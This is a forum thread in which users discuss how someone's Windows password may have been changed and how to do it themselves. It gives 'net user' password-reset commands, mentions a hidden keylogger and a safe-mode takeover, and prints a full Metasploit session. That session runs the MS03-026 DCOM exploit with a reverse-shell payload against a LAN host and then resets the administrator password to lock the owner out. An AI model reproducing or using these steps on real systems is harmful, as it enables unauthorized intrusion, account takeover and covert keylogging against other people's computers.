Hacked!

dude, did you really get hacked? or are you just trying to learn how to hack?

I wouldnt consider that a hack. ;) More like a simple *trick* to get back into you're system in case you forgot your password.
 
well ok i found this on utube but they took the vid out
(luck i wrote it down)

If he was ever on ur computer then he could have never even knew ur password
All u have to do is do something in the command prompt

Got to Run in the start window
Type cmd
then type this with out the quotes "net user"
Then type "net user owner*"

Then i fer got wat to do if anyone has heard of this please finsh
i hate using the Command prompt cuz it makes me scared of the black window
never tried this and dont no if it works

With this u never have to no the users password

and if this does work please erase this message (only intended for the intended eyes)
 
ot to Run in the start window
Type cmd
then type this with out the quotes "net user"
Then type "net user owner*"

Then i fer got wat to do if anyone has heard of this please finsh

Sure I can finish it for you it's (from my pc)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net users administrator *
Type a password for the user:
Retype the password to confirm:
The command completed successfully.


and then the total hack (vulnerability to exploit) while logging into the system and changing the administrators password on the system and locking him out. This is from a box on my *own* WLAN and as you can see this is older.

[*] Starting the Metasploit Framework...



__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf msrpc_dcom_ms03_026(win32_reverse) > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.1.100
LHOST -> 192.168.1.100
msf msrpc_dcom_ms03_026(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 192.168.1.100:4321 <-> 192.168.1.101:3054

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net users administrator *
Type a password for the user:
Retype the password to confirm:
The command completed successfully.



C:\WINDOWS\system32>Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse) >

and
i hate using the Command prompt cuz it makes me scared of the black window

Dude learn the command prompt. Seriously, it will benefit you in the long run. just my two cents. 0x0161
 
i know he could of had a memory stick (flash drive) and a keylogger would run at start-up in hidden mode (so you can't see it. even in task manager) and then he would have taken it out while you wern't looking and he could have checked the logs on his computer.
 
Start>Run>cmd
'net user'
'net user administrator * //(or whatever your account is)
Type new password:
Retype new password:
Done

-Or-

He probably just booted with safe mode and changed it with the administrator account (not your administrator account) from there.



Just 'hack' the same way he 'hacked' lol.
 
Very Nice replies that he received but as he stated his main account and Admin account had been passworded by him. Let me show you something that may have been used by his buddy.

<<LINK DELETED>>

Surprising what can be googled on the internet now days.

{Edit}Sorry buddy, No links to hacking tools.
 
Back
Top Bottom